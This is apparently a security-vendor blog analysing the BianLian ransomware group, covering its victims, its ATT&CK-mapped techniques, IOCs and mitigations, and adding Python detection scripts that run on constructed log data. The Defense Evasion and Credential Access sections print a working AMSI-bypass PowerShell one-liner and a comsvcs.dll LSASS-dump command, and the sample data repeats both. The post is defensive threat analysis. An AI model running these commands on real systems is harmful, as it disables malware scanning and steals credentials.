Introduction
BianLian Ransomware
Cyber threats are escalating in frequency and sophistication, and BianLian has emerged as a significant player targeting critical sectors such as healthcare, manufacturing, and professional services. Since it surfaced in 2022, BianLian has shown considerable adaptability, shifting from a double-extortion model, in which data is both encrypted and exfiltrated, to extortion based on data theft alone [1]. The shift followed Avast's public release of a free decryptor in January 2023, which undermined the group's encryption-based ransom demands and showed how quickly it responds to defensive measures and industry trends.
This blog provides an in-depth analysis of BianLian's tactics, recent high-profile cases, and potential affiliations, offering cybersecurity professionals actionable insights into developing defenses against this adaptable threat actor.
History and Affiliations of BianLian Threat Group
BianLian first drew attention for the rapid development and deployment of its custom ransomware tooling, initially targeting critical infrastructure and other sectors in the United States and Australia. At first the group ran a traditional double-extortion model: it encrypted data and exfiltrated sensitive information, using both to coerce victims into paying.
After Avast released a free decryptor in January 2023, BianLian dropped encryption and moved to pure data-theft extortion [2]. The pivot let the group keep operating effectively against healthcare, manufacturing, and professional-services organizations (examples follow in the next section) [3].
In terms of affiliations, Unit 42 researchers have noted that BianLian appears to be connected to the Makop ransomware group: both have been observed using the same customized .NET tool (see the IOC section) for file enumeration and data exfiltration. The shared toolset and overlapping tactics, techniques, and procedures (TTPs) suggest either direct collaboration or a common supplier, possibly a third-party developer. The overlap reflects a broader trend in the cybercrime underground, where toolkits and methodologies are shared, bought, or sold between groups [3].
Notable Incidents and Attacks of BianLian Threat Group
Since emerging, BianLian has become one of the three most active ransomware groups by number of victim postings, behind only LockBit 3.0 and ALPHV (BlackCat) [4]. By 2024 the group had expanded further and was actively recruiting developers and affiliates to bolster its capabilities.
The group's leak site displays a growing list of victims, primarily targeting organizations in the United States and Europe, with a notable increase in attacks across India and other regions [3]. The healthcare and manufacturing sectors have been especially affected, underscoring BianLian's focus on industries that handle sensitive, critical data [4].
This section will outline significant incidents and attacks carried out by the BianLian group.
Boston Children's Health Physicians (BCHP) Incident – September 2024
In September 2024, Boston Children's Health Physicians (BCHP), a pediatric network operating in New York and Connecticut, experienced a significant cyberattack attributed to the BianLian ransomware group [5]. The breach originated from an IT vendor's compromised systems, allowing unauthorized access to BCHP's network.
The attackers exfiltrated sensitive data, including patient and employee information such as names, Social Security numbers, addresses, dates of birth, driver's license numbers, medical record numbers, health insurance details, billing information, and limited treatment data. Notably, BCHP's electronic medical record systems remained unaffected, as they operated on a separate network [6]. Upon discovering the breach on September 10, BCHP promptly initiated response protocols, including system shutdowns and engaging cybersecurity experts. Affected individuals were notified on October 4, with credit monitoring offered to those impacted.
BianLian Attacked Affiliated Dermatologists & Dermatologic Surgeons, P.A. – March 2024
In early March 2024, Affiliated Dermatologists (AD), a dermatology practice based in New Jersey, fell victim to a ransomware attack orchestrated by the BianLian group [7]. Between March 2 and March 5, unauthorized actors infiltrated AD's network, exfiltrating sensitive data.
The breach, confirmed on April 10, 2024, compromised the personal and medical information of approximately 373,379 individuals, including both patients and employees. The exposed data included names, addresses, dates of birth, Social Security numbers, medical treatment details, and health insurance information [8]. In response, AD promptly notified affected individuals and provided resources for identity theft protection.
Texas Retina Associates Struck by BianLian Ransomware Group – April 2024
In April 2024, Texas Retina Associates, the largest ophthalmology practice in Texas, experienced a significant data breach attributed to the BianLian ransomware group [8]. The breach compromised the personal and medical information of approximately 312,867 patients, including names, contact details, dates of birth, medical record numbers, and health insurance information.
Upon discovering the unauthorized access, Texas Retina Associates promptly secured its systems, enhanced cybersecurity measures, and notified affected individuals. The organization also established a helpline to assist patients with inquiries related to the breach. However, there was no mention of offering complimentary credit monitoring or identity protection services to those impacted.
Tactics, Techniques, and Procedures of BianLian
BianLian ransomware group employs a wide array of tactics, techniques, and procedures (TTPs) to gain and maintain access within victim networks, exfiltrate sensitive data, and extort organizations. Using the MITRE ATT&CK framework, we can map the group's activities to better understand their methods and operational tools.
Initial Access
Valid Accounts (MITRE ATT&CK T1078)
BianLian frequently uses valid credentials, typically harvested through phishing emails [9] or bought from initial access brokers, to log in over Remote Desktop Protocol (RDP). Because the logons use legitimate accounts, the intrusion looks like ordinary administrative activity and is hard to distinguish from it; the RDP logons themselves map to Remote Services: Remote Desktop Protocol (ATT&CK T1021.001).
Exploit Public-Facing Application (MITRE ATT&CK T1190) and External Remote Services (MITRE ATT&CK T1133)
BianLian has also been observed exploiting vulnerabilities in internet-facing services, including ProxyShell on Microsoft Exchange, JetBrains TeamCity [10], and SonicWall VPN devices [11], to breach the perimeter. Exploiting these edge systems gives the group an initial foothold without needing stolen credentials.
Phishing (MITRE ATT&CK T1566)
BianLian uses phishing techniques to trick victims into revealing sensitive information, including their login credentials. These campaigns often involve spear-phishing emails containing malicious attachments or links to compromised websites, facilitating unauthorized access to targeted systems [10].
Execution
Command and Scripting Interpreter (MITRE ATT&CK T1059)
- PowerShell (ATT&CK T1059.001)
- Windows Command Shell (ATT&CK T1059.003)
BianLian utilizes built-in utilities like PowerShell and the Windows Command Shell to discreetly execute various malware-related functions (see the Defense Evasion section for a more in-depth example).
Scheduled Task (MITRE ATT&CK T1053.005)
The group employs scheduled tasks to maintain persistence by scheduling the execution of backdoor payloads. This method ensures that their malicious processes are regularly executed, sustaining their control over compromised systems [12].
Persistence
Account Manipulation (MITRE ATT&CK T1098)
BianLian strengthens its foothold in compromised systems by enabling local administrator accounts and changing their passwords. This approach ensures persistent access and complicates defensive efforts [13].
Create Account: Local Account (MITRE ATT&CK T1136.001)
Alongside account manipulation, the group creates new local accounts to entrench itself in victim networks, so that an alternative route remains if one access vector is closed [13].
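The account manipulation and account creation described in this section leave a distinctive trail in the Windows Security log. As an added example (not code from the original post or from any of the cited reports), the Python below correlates the standard audit events for that trail: 4722 (account enabled) followed by 4724 (password reset) on the same account, or 4720 (account created) followed by 4732 (member added to the local Administrators group, SID S-1-5-32-544). The event records are constructed test data, the flattened field names (`host`, `target`, `group_sid`) are an assumption about how a log pipeline has already parsed the events, and the 30-minute window is a tuning choice.

```python
"""Correlate Windows Security audit events that indicate local-account persistence.

Added example: the event IDs are the standard Windows Security audit IDs, but
the flattened record layout (host/target/group_sid keys) and the sample events
are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

ACCOUNT_CREATED = 4720   # A user account was created
ACCOUNT_ENABLED = 4722   # A user account was enabled
PASSWORD_RESET = 4724    # An attempt was made to reset an account's password
LOCAL_GROUP_ADD = 4732   # A member was added to a security-enabled local group
ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of BUILTIN\Administrators

WINDOW = timedelta(minutes=30)  # assumption: how close the events must be


def _ts(record):
    return datetime.fromisoformat(record["time"])


def _chain(events):
    """Classify a time-ordered run of events for one (host, account)."""
    ids = {e["event_id"] for e in events}
    admin_added = any(
        e["event_id"] == LOCAL_GROUP_ADD and e.get("group_sid") == ADMINISTRATORS_SID
        for e in events
    )
    if ACCOUNT_ENABLED in ids and PASSWORD_RESET in ids:
        return "dormant_account_reactivated"   # T1098: enable + new password
    if ACCOUNT_CREATED in ids and admin_added:
        return "new_local_admin_created"       # T1136.001: create + Administrators
    return None


def correlate(events, window=WINDOW):
    """Return one alert per (host, account) whose events within `window` form a chain."""
    by_account = defaultdict(list)
    for ev in events:
        by_account[(ev["host"], ev["target"].lower())].append(ev)

    alerts = []
    for (host, account), evs in by_account.items():
        evs.sort(key=_ts)
        for i, anchor in enumerate(evs):
            # sliding window: every event from the anchor up to anchor + window
            run = [e for e in evs[i:] if _ts(e) - _ts(anchor) <= window]
            verdict = _chain(run)
            if verdict:
                alerts.append({"host": host, "account": account, "verdict": verdict,
                               "actor": anchor.get("subject"), "start": anchor["time"]})
                break  # one alert per account is enough
    return alerts


# Constructed sample events (not real log data).  For 4732 the `target` key
# holds the member being added and `group_sid` the group it was added to.
SAMPLE_EVENTS = [
    {"time": "2024-09-10T01:00:00", "event_id": 4722, "host": "WS01",
     "target": "Administrator", "subject": "svc_backup"},
    {"time": "2024-09-10T01:01:30", "event_id": 4724, "host": "WS01",
     "target": "Administrator", "subject": "svc_backup"},
    {"time": "2024-09-10T02:00:00", "event_id": 4720, "host": "SRV02",
     "target": "support1", "subject": "jdoe"},
    {"time": "2024-09-10T02:03:00", "event_id": 4732, "host": "SRV02",
     "target": "support1", "subject": "jdoe", "group_sid": "S-1-5-32-544"},
    # benign: a helpdesk password reset with nothing else around it
    {"time": "2024-09-10T09:00:00", "event_id": 4724, "host": "WS07",
     "target": "jsmith", "subject": "helpdesk"},
    # benign: a new account added only to Users (S-1-5-32-545)
    {"time": "2024-09-10T03:00:00", "event_id": 4720, "host": "SRV02",
     "target": "auditsvc", "subject": "jdoe"},
    {"time": "2024-09-10T03:02:00", "event_id": 4732, "host": "SRV02",
     "target": "auditsvc", "subject": "jdoe", "group_sid": "S-1-5-32-545"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The sliding window matters: a lone password reset, or a creation and a group change hours apart, are everyday helpdesk work, and the detector deliberately stays quiet on them.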
Defense Evasion
Modify Registry (T1112)
Using the Windows Command Shell, the group disables security features and runs the commands that give it control over infected hosts.
For instance, it modifies the Windows Registry to switch off Sophos tamper protection (the SAVEnabled and SEDEnabled settings and the SAVService service), which then lets it uninstall those services [12].
Impair Defenses: Disable or Modify Tools (T1562.001)
The group utilizes PowerShell scripts to disable antivirus tools, specifically targeting Windows Defender and the Anti-Malware Scan Interface (AMSI) [12]. This tactic allows them to evade detection and execute further malicious commands.
The following PowerShell one-liner, used by BianLian to disable AMSI, reaches the private static field amsiInitFailed on the internal AmsiUtils class through .NET reflection and sets it to true. PowerShell then behaves as if AMSI failed to initialize and stops submitting script content in that process for scanning:
`([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic, Static').SetValue($null,$true))`
Credential Access
OS Credential Dumping: LSASS Memory (T1003.001)
The group extracts credentials stored in the Local Security Authority Subsystem Service (LSASS) memory. By accessing LSASS, BianLian can obtain usernames and passwords in plaintext or hashed formats, facilitating lateral movement within the network.
The following command line, executed by BianLian, dumps LSASS memory with the built-in comsvcs.dll. The for /f loop pulls the lsass.exe process ID out of tasklist output, and rundll32.exe then calls the MiniDump export of comsvcs.dll with that PID, writing a full memory dump to a file with a harmless-looking .csv extension under C:\Windows\Temp:
`cmd.exe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\<file>.csv full`
Credentials recovered from the dump let the group impersonate legitimate users and escalate privileges.
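Both the AMSI bypass in the Defense Evasion section and the comsvcs.dll LSASS dump above leave recognizable strings in PowerShell script-block logs (Event ID 4104) and process-creation telemetry (Sysmon Event ID 1). As an added example, not code from the original post or the cited reports, the Python below normalizes such records and runs a small rule set over them. Normalization lowercases the text, strips PowerShell's backtick escape character and joins `'...'+'...'` string fragments, so the trivially obfuscated variant of the AMSI one-liner is still caught. The sample records are constructed, and the record layout, rule names and exact regexes are this example's own choices rather than anything taken from BianLian reporting.

```python
"""Rule-based detection of the defense-evasion and credential-dumping command
lines discussed above.

Added example: input records are constructed; the `source`/`text` layout is an
assumption about how a log pipeline presents Sysmon Event ID 1 command lines
and PowerShell Event ID 4104 script blocks.
"""
import re

# Each rule: name -> regex applied to the normalized text.
RULES = {
    # reflection on the internal AmsiUtils class / amsiInitFailed field (T1562.001)
    "amsi_bypass": re.compile(r"amsiutils|amsiinitfailed|amsicontext|amsiscanbuffer"),
    # Set-MpPreference -Disable<Feature> $true / 1 (T1562.001)
    "defender_disable": re.compile(r"set-mppreference.*-disable\w+\s+(\$true|1)\b"),
    # rundll32 comsvcs.dll, MiniDump <pid> <file> full, or any minidump of lsass (T1003.001)
    "lsass_minidump": re.compile(
        r"comsvcs\.dll\s*,?\s*minidump|minidump.*\blsass\b|\blsass\b.*minidump"),
}


def normalise(text):
    """Undo the cheap obfuscations seen in PowerShell one-liners."""
    t = text.lower()
    t = t.replace("`", "")                        # backtick escapes: Ams`iUtils
    t = re.sub(r"['\"]\s*\+\s*['\"]", "", t)      # 'Amsi'+'Utils' -> 'amsiutils'
    t = re.sub(r"\s+", " ", t)                    # collapse whitespace
    return t


def match_rules(text):
    """Return the names of every rule that fires on one record."""
    norm = normalise(text)
    return [name for name, rx in RULES.items() if rx.search(norm)]


def scan(records):
    """records: iterable of {"id", "source", "text"}; returns [(id, rule), ...]."""
    hits = []
    for rec in records:
        for rule in match_rules(rec["text"]):
            hits.append((rec["id"], rule))
    return hits


# Constructed sample records (not real telemetry)
SAMPLE_RECORDS = [
    {"id": 1, "source": "powershell/4104",
     "text": "([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
             ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true))"},
    {"id": 2, "source": "powershell/4104",   # same bypass, string-split and backticked
     "text": "[Ref].Assembly.GetType('System.Management.Automation.'+'Am`si'+'Utils')"
             ".GetField('amsiInit'+'Failed','NonPublic,Static').SetValue($null,$true)"},
    {"id": 3, "source": "powershell/4104",
     "text": "Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"id": 4, "source": "sysmon/1",
     "text": 'cmd.exe /Q /c for /f "tokens=1,2 delims= " %A in '
             '(\'"tasklist /fi "Imagename eq lsass.exe" | find "lsass""\') '
             'do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump %B '
             '\\Windows\\Temp\\report.csv full'},
    {"id": 5, "source": "powershell/4104",   # benign: reading, not changing, Defender state
     "text": "Get-MpPreference | Select-Object DisableRealtimeMonitoring"},
    {"id": 6, "source": "sysmon/1",          # benign rundll32 use
     "text": "rundll32.exe shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for rec_id, rule in scan(SAMPLE_RECORDS):
        print(f"record {rec_id}: {rule}")
```

String matching of this kind is only as good as the normalization in front of it; the two AMSI records show why the join step is needed, and a real deployment would also want Script Block Logging enabled so the 4104 events exist in the first place.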
OS Credential Dumping: NTDS (MITRE ATT&CK T1003.003)
BianLian targets the NTDS.dit file, which contains Active Directory data, including user account information and password hashes. By extracting this file, the group gains access to a comprehensive list of credentials, enabling them to compromise multiple accounts and maintain persistent access.
To facilitate these activities, BianLian utilizes tools such as secretsdump.py, part of the Impacket toolkit [14]. This tool allows them to extract password hashes and other credential data from remote systems, further enhancing their ability to move laterally and escalate privileges within the network.
Discovery
Account Discovery: Domain Account (MITRE ATT&CK T1087.002)
The group queries domain controllers to enumerate user accounts, groups, and domain trusts, identifying potential lateral movement pathways. By executing commands like net user /domain, BianLian gathers information on domain user accounts, aiding in privilege escalation and further infiltration [3].
Permission Groups Discovery: Domain Groups (MITRE ATT&CK T1069.002)
BianLian identifies domain groups and their memberships to understand the organizational structure and locate high-privilege accounts. Commands such as net group /domain are utilized to list domain groups, providing insights into group memberships and associated permissions [3].
Network Service Discovery (MITRE ATT&CK T1046)
The group employs tools like Advanced Port Scanner to identify open ports and services running on networked systems. This information helps BianLian determine potential targets for exploitation and lateral movement within the network [3].
The following execution path, observed in BianLian intrusions, shows the scanner being run from a numbered folder under the user's temporary directory:
`C:\Users\%username%\AppData\Local\Temp\31\Advanced_Port_Scanner_2.5.3869.exe`
Network Share Discovery (MITRE ATT&CK T1135)
BianLian uses tools such as SharpShares to enumerate accessible network shares. By identifying shared resources, the group can locate and exfiltrate sensitive information stored on networked systems [3].
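Taken individually, net user /domain, net group /domain and a port scan are things administrators also run; what stands out in the Discovery activity described above is a burst of several of them from one account on one host within a few minutes. As an added example (not from the original post or the cited reports), the Python below counts distinct discovery techniques per (host, user) inside a short window and alerts only when several appear together. The process records are constructed, the five-minute window and the threshold of three techniques are tuning assumptions, and Advanced Port Scanner and SharpShares are recognized here by executable name only.

```python
"""Flag bursts of domain/network discovery commands from one account on one host.

Added example: the process-creation records are constructed, and the window
and threshold values are tuning assumptions, not figures from BianLian reporting.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# ATT&CK technique -> regex over the lower-cased command line
DISCOVERY = {
    "T1087.002 domain accounts": re.compile(r"\bnet1?\s+user\b.*\s/domain\b"),
    "T1069.002 domain groups":   re.compile(r"\bnet1?\s+group\b.*\s/domain\b"),
    "T1046 network services":    re.compile(r"advanced_port_scanner[^\\]*\.exe"),
    "T1135 network shares":      re.compile(r"\bsharpshares\b|\bnet1?\s+view\b"),
}
WINDOW = timedelta(minutes=5)   # assumption
THRESHOLD = 3                   # assumption: distinct techniques needed to alert


def classify(cmdline):
    """Return the discovery techniques a single command line exhibits."""
    low = cmdline.lower()
    return [tech for tech, rx in DISCOVERY.items() if rx.search(low)]


def find_bursts(records, window=WINDOW, threshold=THRESHOLD):
    """One alert per (host, user) that ran >= threshold distinct techniques within window."""
    by_actor = defaultdict(list)
    for rec in records:
        when = datetime.fromisoformat(rec["time"])
        for tech in classify(rec["cmdline"]):
            by_actor[(rec["host"], rec["user"].lower())].append((when, tech))

    alerts = []
    for (host, user), items in by_actor.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            seen = {tech for when, tech in items[i:] if when - start <= window}
            if len(seen) >= threshold:
                alerts.append({"host": host, "user": user,
                               "start": start.isoformat(), "techniques": sorted(seen)})
                break
    return alerts


# Constructed sample records (not real telemetry)
SAMPLE_RECORDS = [
    # burst: four techniques in under two minutes from a service account
    {"time": "2024-03-02T10:00:00", "host": "WS05", "user": "svc_backup",
     "cmdline": "net user /domain"},
    {"time": "2024-03-02T10:00:20", "host": "WS05", "user": "svc_backup",
     "cmdline": 'net group "Domain Admins" /domain'},
    {"time": "2024-03-02T10:01:05", "host": "WS05", "user": "svc_backup",
     "cmdline": "C:\\Users\\svc_backup\\AppData\\Local\\Temp\\31\\Advanced_Port_Scanner_2.5.3869.exe"},
    {"time": "2024-03-02T10:01:50", "host": "WS05", "user": "svc_backup",
     "cmdline": "SharpShares.exe /threads:50"},
    # an administrator doing similar things spread over the day: no burst
    {"time": "2024-03-02T08:00:00", "host": "ADM01", "user": "admin.jane",
     "cmdline": "net user /domain"},
    {"time": "2024-03-02T14:30:00", "host": "ADM01", "user": "admin.jane",
     "cmdline": "net group /domain"},
    {"time": "2024-03-02T14:31:00", "host": "ADM01", "user": "admin.jane",
     "cmdline": "net view \\\\fileserver01"},
    # a lone lookup of one account
    {"time": "2024-03-02T11:15:00", "host": "WS09", "user": "bob",
     "cmdline": "net user bob /domain"},
]

if __name__ == "__main__":
    for alert in find_bursts(SAMPLE_RECORDS):
        print(alert)
```

The administrator on ADM01 trips two techniques within a minute but never three, which is the point of thresholding on distinct techniques rather than raw command counts.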
Collection
Clipboard Data (MITRE ATT&CK T1115)
BianLian uses malware that captures data copied to the clipboard, intercepting passwords, personal identification numbers and other confidential information that users paste between applications.
Command and Control
Ingress Tool Transfer (MITRE ATT&CK T1105)
The group transfers tools and payloads directly into compromised environments, facilitating further malicious activities without excessive exposure. By downloading additional modules and tools, BianLian can escalate privileges and establish a persistent foothold in the compromised system.
Remote Access Software (MITRE ATT&CK T1219)
BianLian uses legitimate remote access software, such as TeamViewer, to maintain covert and interactive command and control capabilities over infected devices. This approach allows them to blend in with normal network traffic and evade detection.
They have also been known to use other remote access tools like Atera Agent and SplashTop for similar purposes.
Exfiltration
Transfer Data to Cloud Account (T1537)
The group utilizes tools like Rclone to exfiltrate collected data to cloud storage accounts under their control. By syncing files to cloud services, BianLian complicates detection and attribution efforts, as the data transfer blends with legitimate cloud operations.
For instance, they have been observed placing the Rclone binary in folders that rarely get scrutiny, such as C:\ProgramData\VMware or a user's Music folder, to avoid detection.
Exfiltration Over Alternative Protocol (T1048)
BianLian also moves data out over protocols separate from its command-and-control channel, notably File Transfer Protocol (FTP). Because the transfer never touches the C2 infrastructure and rides on an ordinary file-transfer protocol, it can slip past detections tuned to the group's command-and-control traffic, which is why FTP exfiltration has been observed in its intrusions.
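The two exfiltration methods above can be spotted from different telemetry: Rclone from process-creation events, and FTP from flow records. As an added example (not code from the original post or the cited reports), the Python below does both. On the process side it relies on the PE version information Sysmon reports as OriginalFileName, so a copy of rclone.exe renamed to svchost.exe and dropped in C:\ProgramData\VMware is still recognized, and it looks for the `remote:path` destination syntax Rclone uses. On the network side it pairs any port-21 control connection with the total outbound volume to the same peer, because FTP sends the actual data over separate connections (port 20, or ephemeral ports in passive mode) and the control flow itself stays small. All records are constructed; the field names, the approved install path and the 100 MiB threshold are assumptions.

```python
"""Spot Rclone-based exfiltration from process telemetry and large FTP
transfers from flow records.

Added example: records are constructed; the field names (image,
original_file_name, cmdline, dport, bytes_out), the approved path and the
byte threshold are assumptions about a Sysmon/NetFlow pipeline.
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Directories where BianLian has been seen dropping Rclone to avoid attention
SUSPICIOUS_DIRS = ("programdata\\vmware", "\\music\\")
# Where a sanctioned Rclone install would normally live (assumption)
APPROVED_DIRS = ("c:\\program files\\rclone\\",)
# rclone <verb> <src> <remote>:<path>; a remote name is 2+ chars, so C:\ does not match
REMOTE_DEST = re.compile(r"\b(copy|copyto|sync|move|moveto)\b.*\s[a-z][a-z0-9_-]+:")
FTP_PORT = 21
FTP_BYTES_THRESHOLD = 100 * 1024 * 1024   # assumption: 100 MiB outbound to one peer


def flag_process(ev):
    """Return the reasons a process-creation event looks like Rclone exfiltration."""
    reasons = []
    image = ev["image"].lower()
    original = ev.get("original_file_name", "").lower()
    cmd = ev.get("cmdline", "").lower()
    name = PureWindowsPath(image).name
    if original != "rclone.exe" and name != "rclone.exe":
        return reasons
    if name != original:
        reasons.append("renamed_tool")          # version info says rclone, file name does not
    if any(d in image for d in SUSPICIOUS_DIRS):
        reasons.append("suspicious_path")
    elif not image.startswith(APPROVED_DIRS):
        reasons.append("unapproved_path")
    if REMOTE_DEST.search(cmd):
        reasons.append("remote_destination")    # data is going to a cloud remote
    return reasons


def flag_ftp_sessions(flows, threshold=FTP_BYTES_THRESHOLD):
    """Pair port-21 control flows with total outbound bytes to the same peer.

    The data channel uses other ports, so summing per (src, dst) catches the
    passive-mode transfers that a port-21-only rule would miss."""
    control_peers = {(f["src"], f["dst"]) for f in flows if f["dport"] == FTP_PORT}
    volume = defaultdict(int)
    for f in flows:
        volume[(f["src"], f["dst"])] += f["bytes_out"]
    return sorted((src, dst, volume[(src, dst)]) for src, dst in control_peers
                  if volume[(src, dst)] >= threshold)


# Constructed sample telemetry (not real data)
SAMPLE_PROCESSES = [
    {"image": "C:\\ProgramData\\VMware\\svchost.exe", "original_file_name": "rclone.exe",
     "cmdline": "svchost.exe copy C:\\Finance mega:share --transfers 16"},
    {"image": "C:\\Users\\bob\\Music\\rclone.exe", "original_file_name": "rclone.exe",
     "cmdline": "rclone.exe sync D:\\Shares\\HR ftp-ext:/drop"},
    {"image": "C:\\Program Files\\rclone\\rclone.exe", "original_file_name": "rclone.exe",
     "cmdline": "rclone.exe sync C:\\Backups gdrive-corp:nightly"},
    {"image": "C:\\Windows\\System32\\notepad.exe", "original_file_name": "NOTEPAD.EXE",
     "cmdline": "notepad.exe C:\\notes.txt"},
]
SAMPLE_FLOWS = [
    {"src": "10.0.5.23", "dst": "203.0.113.40", "dport": 21, "bytes_out": 4_200},
    {"src": "10.0.5.23", "dst": "203.0.113.40", "dport": 51234, "bytes_out": 2_600_000_000},
    {"src": "10.0.5.9", "dst": "203.0.113.41", "dport": 21, "bytes_out": 3_000},
    {"src": "10.0.5.9", "dst": "203.0.113.41", "dport": 50010, "bytes_out": 40_000},
    {"src": "10.0.5.9", "dst": "198.51.100.7", "dport": 443, "bytes_out": 3_000_000_000},
]

if __name__ == "__main__":
    for ev in SAMPLE_PROCESSES:
        print(PureWindowsPath(ev["image"]).name, flag_process(ev))
    print(flag_ftp_sessions(SAMPLE_FLOWS))
```

The sanctioned install in Program Files still produces a `remote_destination` hit, which is intended: the destination remote is worth a look even when the binary is legitimate, and the reason list lets a pipeline weight it lower than a renamed copy in a VMware folder.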
Indicators of Compromise (IOCs)
The following are the known Indicators of Compromise (IOCs) associated with the BianLian ransomware group. These IOCs include file hashes, IP addresses, and other relevant artifacts identified through various analyses and reports.
File Hashes
BianLian Backdoor IOCs (SHA-256)
Advanced Port Scanner
d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb
BianLian Custom .NET Tool
40126ae71b857dd22db39611c25d3d5dd0e60316b72830e930fba9baf23973ce
Mitigation and Defense Strategies
To effectively defend against BianLian ransomware attacks, organizations should implement a comprehensive cybersecurity strategy encompassing the following measures:
Strengthen Access Controls:
- Implement Multi-Factor Authentication (MFA): Require MFA for all user accounts, especially those with administrative privileges, to add an extra layer of security.
- Enforce Strong Password Policies: Mandate complex passwords and regular updates to reduce the risk of credential compromise.
Secure Remote Access:
- Restrict Remote Desktop Protocol (RDP) Access: Disable RDP if not essential. If necessary, limit access through virtual private networks (VPNs) and enforce strong authentication mechanisms.
- Monitor Remote Connections: Regularly review logs for unusual remote access activities to detect potential intrusions.
Enhance Email Security:
- Deploy Advanced Email Filtering: Utilize solutions that detect and block phishing emails, a common vector for BianLian's initial access.
- Conduct Employee Training: Educate staff to recognize and report phishing attempts, reinforcing a security-aware culture.
Implement Network Segmentation:
- Isolate Critical Systems: Separate essential services and data from the broader network to limit lateral movement in case of a breach.
- Control Inter-Segment Communication: Use firewalls and access controls to manage traffic between network segments.
Maintain Regular Data Backups:
- Adopt the 3-2-1 Backup Strategy: Keep three copies of data on two different media, with one stored offsite, ensuring data recovery without paying ransoms.
- Test Backup Restoration: Regularly verify that backups can be restored effectively to ensure data integrity.
Conclusion
Key Takeaways from BianLian Ransomware Attacks
BianLian's evolution from traditional ransomware encryption to a focus on data theft and extortion underscores its adaptability in the cyber threat landscape. By targeting critical sectors such as healthcare, manufacturing, and professional services, the group has demonstrated a sophisticated understanding of industry vulnerabilities. Their strategic shift reflects a keen awareness of defensive measures and law enforcement actions, enabling them to maintain a significant impact. For cybersecurity professionals, comprehending BianLian's tactics and methodologies is essential for developing robust defenses against this persistent and evolving threat actor.
References
[1] B. Toulas, "BianLian ransomware gang shifts focus to pure data extortion," BleepingComputer, Mar. 16, 2023. Available: https://www.bleepingcomputer.com/news/security/bianlian-ransomware-gang-shifts-focus-to-pure-data-extortion/
[2] A. Venkat, "BianLian ransomware group shifts focus to extortion," CSO Online, Mar. 20, 2023. Available: https://www.csoonline.com/article/574801/bianlian-ransomware-group-shifts-focus-to-extortion.html
[3] D. Frank, "Threat Assessment: BianLian," Unit 42, Jan. 23, 2024. Available: https://unit42.paloaltonetworks.com/bianlian-ransomware-group-threat-assessment/
[4] P. Kimayong, "BianLian Ransomware Group: 2024 Activity Analysis," Official Juniper Networks Blogs, Jul. 11, 2024. Available: https://blogs.juniper.net/en-us/security/bianlian-ransomware-group-2024-activity-analysis
[5] HIPAA Journal. Available: https://www.hipaajournal.com/bianlian-cyberattack-boston-childrens-health-physicians/
[6] "Cybersecurity Announcement." Available: https://bchp.childrenshospital.org/cybersecurityannouncement
[7] Cybernews. Available: https://cybernews.com/news/affiliated-dermatologists-data-security-incident/
[8] "Affiliated Dermatologists says ransomware attack impacted over 370,000 patients and employees," teiss. Available: https://www.teiss.co.uk/news/affiliated-dermatologists-says-ransomware-attack-impacted-over-370000-patients-and-employees-14106
[9] T. S. Dutta, "BianLian Ransomware Leveraging RDP Credentials To Gain Initial Access," Cyber Security News, Jul. 15, 2024. Available: https://cybersecuritynews.com/bianlian-ransomware-rdp-access/
[10] L. Constantin, "BianLian group exploits TeamCity again, deploys PowerShell backdoor," CSO Online, Mar. 11, 2024. Available: https://www.csoonline.com/article/1312926/bianlian-group-exploits-teamcity-again-deploys-powershell-backdoor.html
[11] "BianLian," SentinelOne, Jun. 07, 2023. Available: https://www.sentinelone.com/anthology/bianlian/
[12] MyCERT, Advisory MA-941.062023. Available: https://www.mycert.org.my/portal/advisory?id=MA-941.062023
[13] RH-ISAC, "BianLian Ransomware Expanding C2 Infrastructure and Operational Tempo." Available: https://rhisac.org/threat-intelligence/bianlian-ransomware-expanding-c2-infrastructure-and-operational-tempo/
[14] A. Ribeiro, "US, Australian security agencies warn of BianLian group using valid RDP credentials to target organizations," Industrial Cyber, May 17, 2023. Available: https://industrialcyber.co/cisa/us-australian-security-agencies-warn-of-bianlian-group-using-valid-rdp-credentials-to-target-organizations/